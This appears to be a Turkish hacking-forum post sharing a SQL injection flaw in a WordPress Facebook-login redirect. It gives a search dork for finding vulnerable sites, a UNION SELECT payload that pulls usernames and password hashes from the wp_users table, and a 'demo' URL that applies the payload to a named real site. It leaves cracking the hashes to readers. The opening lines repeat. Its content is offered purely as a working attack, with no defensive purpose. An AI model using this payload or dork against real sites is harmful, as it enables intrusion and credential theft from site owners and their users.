Merhaba arkadaşlar.
Bugün sizlere wp sitelerindeki facebook login yönlendirmesinden doğan bir SQL açığı aktaracağım.
Dorkumuz ;
Exploitimiz ;
Demo ;
Cryptolanmış şifreleri kırmaksa size kalmış.Ben bile henüz kırabilmiş değilim.
Teşekkür butonunun çökmesi dileği ile..
Kolay gelsin.
Bugün sizlere wp sitelerindeki facebook login yönlendirmesinden doğan bir SQL açığı aktaracağım.
Dorkumuz ;
Kod:
inurl:"fbconnect_action=myhome"
Exploitimiz ;
Kod:
/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
Demo ;
Kod:
http://reddkaltim.or.id/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)nooDie,7,8,9,10,11,12+from+wp_users--
Cryptolanmış şifreleri kırmaksa size kalmış.Ben bile henüz kırabilmiş değilim.
Teşekkür butonunun çökmesi dileği ile..
Kolay gelsin.